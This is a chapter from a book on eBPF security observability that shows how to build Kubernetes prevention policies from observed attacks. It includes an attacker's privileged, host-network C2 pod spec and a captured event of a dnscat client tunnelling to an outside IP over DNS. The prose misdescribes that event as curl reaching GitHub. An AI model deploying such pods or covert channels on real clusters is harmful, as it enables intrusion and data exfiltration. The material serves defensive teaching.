Chapter 4. Security Prevention

What if you want to prevent an attack instead of retroactively detecting it? In this chapter, we’ll use the security observability events that we detected in Chapter 3 to develop prevention policies to block the attack at different stages. Using security observability events to develop a prevention policy is called observability-driven policy. We directly translate the security observability events to craft prevention policy based on observed real-world behavior. Why do we suggest using real events to create such a policy?

Security prevention is a powerful tool; it has the ability to stop attacks before they occur. However, used incorrectly, it also has the ability to break legitimate application or system behavior. For example, if we wanted to create a prevention policy that blocks the setuid system call,1 we could break legitimate container runtime initialization behavior that requires the setuid system call.

So, how can you create a prevention policy that denies malicious behavior but doesn’t negatively impact your applications? Referencing your security observability events, you can quickly identify all of the setuid system calls made in your environment. Identifying runtime or application events that include the setuid system call prevents you from applying a breaking change to your policy.

Security observability can also highlight misconfigurations or overly permissive privileges in your workloads. This gives security the data it needs to objectively measure their security state, in real time and historically. Security could adopt a lot from SRE: observability, blameless post-mortems, error budgets, security testing, security level objectives, and more. It’s all rooted by collecting and measuring our observability data.

Prevention by Way of Least-Privilege

Another way security observability plays a key role in your security strategy is by recording all capabilities and system calls a workload requires during its lifecycle and building out a least-privilege configuration for applications. The default Docker seccomp profile blocks several known privilege escalation vectors in containers and was created by using this technique.2 You can also reference capabilities observed by an application to create a least-privilege prevention policy with the minimum set of capabilities it uses. This avoids the trial-and-error approach of least-privilege by removing capabilities and seeing what breaks. Observing an application’s capabilities at runtime provides us with the exact, minimally required set of capabilities an application is required to run, and nothing more. Using this approach, we can create an allowlist, which defines acceptable application behavior and denies everything else.

Using security observability to secure your applications solves the long-standing problem of overly permissive security policies and misconfigurations, which have been responsible for countless vulnerabilities and compromises.3

An alternative security approach that doesn’t require observability is a denylist, which blocks specific known bad behavior and allows everything else. We’ll discuss how security observability can create a more targeted and useful denylist, based on observability during CTF and red team4 exercises as well.

Allowlist

Observability during baseline (normal) application behavior reveals the application’s required capabilities. Using baseline observability, we can build an allowlist, which specifies what actions an application is allowed to do and blocks everything else. The ideal security posture only grants the capabilities and privileges an application needs. Observability translates an application’s high-level abstractions (functions and code paths) into system calls and operating system capabilities that we can build a prevention policy around.

If we base our prevention policy on application observability, how can we be sure that our application isn’t already compromised or untrustworthy when we apply our observability? A common security pattern emerging in cloud native computing is ephemeral infrastructure or reverse uptime. The basic premise is that a system loses trust over time as its entropy increases, such as an internet-exposed application being attacked, or a platform operator installing debugging utilities in the container environment. Time and changes to a system lead to a degradation in its trust.

Using infrastructure as code, some security-conscious organizations employ a “repaving” method where they destroy and rebuild infrastructure from a known good state at a regular cadence to combat the problem of trust and entropy. A newly deployed system at build time is more trustworthy than a long running system because we avoid configuration drift and can account for every bit in the deployment before any changes are introduced.5 This is the optimal time for observing the legitimate behavior of an application.

We can only understand an application’s baseline behavior once we apply security observability, so it’s a requirement for building an allowlist prevention policy.

Denylist

Denylists specify the behavior that should be denied by policy and allows everything else. Denylists have limitations; namely, they only block one implementation of an attack, still providing an overly permissive policy that can lead to vulnerabilities or compromise. There’s far more opportunity to compromise an application by using a denylist because it only blocks known attack vectors and malicious behavior. If you’re unsure what type of behavior to deny, you can use security observability during a simulated or real attack.

Using security observability during a CTF, or red team exercise reveals common attacker tactics, techniques, and procedures (TTPs). These techniques can build out a denylist policy that safely blocks attacker behavior using the observability-driven policy approach. We provide example denylist prevention policies for each of the attack stages in Chapter 3 in our Git repository.6

Testing Your Policy

Security teams in cloud native environments should follow DevSecOps and SRE practices of testing policy changes before deploying a change that could break production workloads. We recommend following Gitops practices,7 by performing a dry run of a policy change on a development or staging environment with simulated workloads. This step tests that you’re blocking only behavior that violates your policy, and crucially, won’t introduce any breaking changes to your production workloads.

Finally, by reproducing the attack with the new prevention policy changes applied, we can test that we either safely block the attack, or that further changes are required.

Tracing Policy

Whether you’re building out an allowlist or a denylist, you can use Cilium Tetragon to get an enforcement framework called tracing policy. Tracing policy is a user-configurable Kubernetes custom resource definition (CRD) that allows users to trace arbitrary events in the kernel and define actions to take on a match. This presents a powerful framework where eBPF can deeply introspect arbitrary process attributes, including process ancestry, binary digest, directory of binary execution, command-line arguments, etc., and develop a fully customized detection or prevention policy around any of these attributes.

Contrast this flexibility with something like seccomp, which, at a high level, creates a combination of an allowlist and a denylist for containers with system calls. Some observability tools based on seccomp can evaluate a list of observed system calls an application makes and then define a seccomp “profile” from that list.8

But what if you need more flexibility than system calls? What if you need to include system calls that are required by the container runtime even if we would rather restrict them at application runtime? What if you wanted to make changes to policy dynamically without needing to restart your applications?

Tracing policy is fully Kubernetes-aware, so it can enforce on system calls or user-configurable filters after the pod has reached a Ready state.9 We can also make changes to policy that dynamically update the eBPF programs in the kernel and change enforcement policies without requiring we restart the applications or the node. Once we trigger a policy event in tracing policy, we can either send an alert to a security analyst or prevent the behavior with a SIGKILL signal to the process.10

By using tracing policies, we can prevent the attack we carried out in Chapter 3 in different stages:

Exploitation stage

We created a privileged container and kubectl exec in, moved into the host namespaces with nsenter, and ran bash with root privileges.

Persistence

We created an invisible C2 agent pod by writing a PodSpec to the kubelet’s /etc/kubernetes/manifests directory.

Post-exploitation

We exfiltrated sensitive data with the C2 agent.

You might ask, why should I implement a prevention policy at several stages? Doesn’t it make the most sense to deny actions early in the beginning stages of an attack? We recommend applying a policy at multiple stages of an attack to adopt the security framework called defense in depth.

In this context defense in depth means building a prevention policy that covers different stages, so if one defense fails to block a kubectl exec, another policy is available to disrupt or block data exfiltration. Additionally, it might be too restrictive to block certain execution actions, whereas blocking lateral movement might be more of an acceptable prevention policy in your environment. We provide a prevention policy for each of the stages discussed for defense in depth.

Stage 1: Exploitation

The first stage of the attack we carried out in Chapter 3 takes advantage of an overly permissive pod configuration to exploit the system with a hidden command and control (C2) pod. We launched a privileged pod that grants,11 among other things, the CAP_SYS_ADMIN Linux capability. This configuration can facilitate a direct access to host resources from a pod, often giving a pod the same permissions as root on the node:

kind: Pod
…
  name: merlin-agent
  namespace: doesnt-exist
  hostNetwork: true
…
    securityContext:
      privileged: true

There are several defenses you can use against overly permissive pods being deployed in your environment. One of the most common defenses is using an admission controller in Kubernetes such as Open Policy Agent (OPA) or Kyverno. An admission controller “is a piece of code that intercepts requests to the Kubernetes API server prior to persistence of the object”12 to the Kubernetes database, etcd. For an example of how to use OPA to block commonly seen dangerous pod configurations, check out the author’s KubeCon talk.13

Admission controllers have some limitations. They operate at the Kubernetes API server layer, which means they protect against dangerous pod configurations that “come through the front door,” or are administered through the API server. This protection breaks down for exploits like the attack we carried out in Chapter 3, where we deployed a silent C2 agent pod directly to the kubelet, bypassing the API server altogether.

Runtime protection with Cilium Tetragon applies to all containers (or optionally, Linux processes) in a system, whether they’re submitted through the API server or run directly by the container runtime. For example, we can block every container (or Linux process) that starts with the CAP_SYS_ADMIN capability with the deny-privileged-pod.yaml14 tracing policy, as shown in Figure 4-1.

Blocking a privileged pod start by a tracing policy in Step 3
Figure 4-1. Blocking a privileged pod start by a tracing policy in Step 3

Stage 2: Persistence and Defense Evasion

“Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.”15 In our attack, we achieved persistence by launching a C2 pod that’s managed directly by the kubelet and is hidden from the API server. This pod then established a connection to the C2 server to await instructions.

There are several ways to prevent this behavior. One of the simplest and most effective is to employ an egress network policy that blocks arbitrary connections to the internet from pods.

However, our C2 pod took advantage of a network policy circumvention method by using the host machine’s network namespace (hostNetwork: true), which suppresses any protections from network policy. This is known as defense evasion, which “consists of techniques that adversaries use to avoid detection throughout their compromise.”16

Additional techniques to circumvent network policy include tunneling all traffic over DNS. Network policies explicitly allow UDP port 53 traffic to enable a workload to resolve cluster services and fully qualified domain names (FQDNs). An attacker can take advantage of this “open hole” in policy to send any kind of traffic to any host using DNS as a covert channel. This attack was discussed and demoed in the excellent KubeCon talk by Ian Coldwater and Brad Geesaman, titled Kubernetes Exposed!17 Security observability reveals the attack, as seen in the following code where a curl binary connects to GitHub via HTTPS over DNS:

  "process_connect": {
    "process": {
      "cwd": "/tmp/.dnscat/dnscat2_client/",
      "binary": "/tmp/.dnscat/dnscat2_client/dnscat",
      "arguments": "--dns=server=35.185.234.97,port=53",
      "pod": {
        "namespace": "default",
        "name": "covert-channel",
        "labels": [
          "k8s:io.kubernetes.pod.namespace=default"
        ],
    },
    "source_ip": "10.0.0.2",
    "source_port": 44415,
    "destination_ip": "35.185.234.97",
    "destination_port": 53,
    "protocol": "UDP"

This reveals the covert DNS channel and allows you to use detection data to update your prevention policy and defend against these attacks. Ironically, a hardened network policy is an optimal protection for this attack. CNIs such as Cilium have network policies that define which DNS server a pod can use and works off of layer 7 attributes such as limiting which FQDNs a pod, namespace, or cluster can query.18

Additionally, pods that use host resources in Kubernetes are a great target for observability-driven policy.19 You can configure an admission controller policy or a Cilium Tetragon tracing policy to block the dangerous hostNetwork configuration,20 as shown in Figure 4-2, and verify that it won’t invoke an outage by referencing security observability monitoring.

A persistence attack is blocked in Step 1 using a tracing policy based on host resource declaration and in Step 3 using an egress network policy.
Figure 4-2. A persistence attack is blocked in Step 1 using a tracing policy based on host resource declaration and in Step 3 using an egress network policy

Stage 3: Post-Exploitation

Post-exploitation refers to the actions an attacker takes after a compromise of a system. Post-exploitation behavior can include command and control, lateral movement, data exfiltration, and more. In the attack we carried out in Chapter 3, post-exploitation refers to the C2 agent making a connection to the C2 server hosted at the benign-looking linux-libs.org domain and awaiting instructions from the attacker.

There are several defenses for post-exploitation behavior. The most effective protection you can take is limiting the network connections your pods can make, particularly to the internet. The internet should be considered a hostile zone for production workloads, and in our example we define a layer 7 network policy at Step 1 that blocks all connections to the internet, other than the api.twitter.com hostname. Lateral movement is another post-exploitation behavior that can be mitigated by employing a locked-down network policy. Cilium provides a free resource to visually create a locked-down network policy.21

In addition to limiting the network connections a pod can make, limiting which files a pod can access is another defense we can employ. Sensitive or high-value files follow the observability-driven policy pattern where we monitor all access to a file; once we understand legitimate access behavior we can apply a policy that blocks any suspicious access. Examples for denying suspicious network connections and file access with policies can be seen in Figure 4-3.

Post exploitation attack is blocked in Step 1 using an egress network policy  in Step 3 by limiting access to a sensitive file  and in Step 4 again by using an egress network policy.
Figure 4-3. Post-exploitation attack is blocked in Step 1 using an egress network policy, in Step 3 by limiting access to a sensitive file, and in Step 4 again by using an egress network policy.

Data-Driven Security

Now that we’ve locked down our environment to prevent this attack, we recommend that you continue to make continuous observations and improvements to your security posture with security observability. Preventing an attack starts with detecting it, and ensuring you have a high fidelity of security observability to detect malicious behavior also ensures you have the inputs for making ongoing improvements to your prevention policy.

This data-driven workflow to create and continuously improve your security is the most crucial part of observability-driven policy.

CTFs, Red Teams, Pentesting, Oh My!

If you’d prefer building out a detection program in a more test-friendly environment than staging or production, you can begin with CTF events. Using security observability during Kubernetes CTF, red team exercises, and penetration testing is the best way to start providing visibility into attacker techniques and will enable you to build out an alerting and prevention policy using your data.

The lovely folks at Control Plane created and maintain a Kubernetes CTF infrastructure you can use to familiarize yourself with Kubernetes security, all while improving your attacking skills and detection program. We recommend applying the security observability skills you’ve learned in this report during community Kubernetes CTF exercises. Even if you don’t succeed at all the CTF exercises at first, the walkthrough itself is invaluable to learn attack techniques on Kubernetes and build out your detection program.

1 The setuid system call sets the effective user ID of a process. The effective user ID is used by the operating system to determine privileges for an action.

2 In a 2016 blog post, Jessie Frazelle describes how to create your own custom seccomp profile by capturing all the system calls your workload requires, and describes how the default Docker seccomp profile was created based on such an allowlist policy.

3 Misconfiguration accounted for 59% of detected security incidents related to Kubernetes according to Red Hat’s State of Kubernetes Security Report.

4 Red team is a term that describes various penetration testing, including authorized attacks on infrastructure and code, with the intent of improving the security of an environment by highlighting weak points in their defenses.

5 This assumes you trust your build and supply chain security. The state-of-the-art defense for supply chain security in cloud native is Sigstore, which has automated digitally signing and checking components of your build process. According to AWS CloudFormation, “Drift detection enables you to detect whether a stack’s actual configuration differs, or has drifted, from its expected configuration.”

6 Our GitHub repo contains all the events and prevention policies discussed in this book.

7 Gitops refers to the patterns in cloud native environments where changes to infrastructure are made to a version control system, and CI/CD pipelines test and apply changes automatically. In short, operations teams adopt development team patterns.

8 Seccomp acts on user-configurable profiles, which are configuration files that specify the system calls and arguments a container is allowed or disallowed to invoke.

9 Pod readiness gates are part of the pod lifecycle events and indicate that a pod is healthy and ready to receive traffic.

10 Additional prevention mechanisms such as the kernel’s cgroup freezer mechanism are supported, which stops a container but leaves its state (stack, file descriptors, etc.) in place for forensic extraction.

11 A privileged container is able to access and manipulate any devices on a host, thanks to being granted the CAP_SYS_ADMIN capability.

12 Admission controllers are an essential security tool to build out a security policy for Kubernetes objects.

13 In the video “The Hitchhiker’s Guide to Container Security”, we use OPA to block dangerous pod configurations.

14 Here is an example prevention policy for privileged pods.

15 Persistence techniques are described in the MITRE ATT&CK framework.

16 Defense evasion is a fascinating topic. Detection can be circumvented using novel attacker techniques, forcing detection tools to constantly improve the reliability of their visibility.

17 Ian Coldwater and Brad Geesaman discuss several attack vectors on Kubernetes clusters in this recording. It is required viewing for defenders.

18 Layer 7 network policy examples can be found on the Cilium site.

19 These include hostPID, hostIPC, hostNetwork, hostPorts, and allowedHostPaths. The Kubernetes documentation explicitly calls out that host resources are a known source of privilege escalation and should be avoided.

20 A prevention policy blocking namespace changes can be found on GitHub.

21 The Cilium CNI provides network observability via Hubble which can also be used to create observability-driven policy.

Get Security Observability with eBPF now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.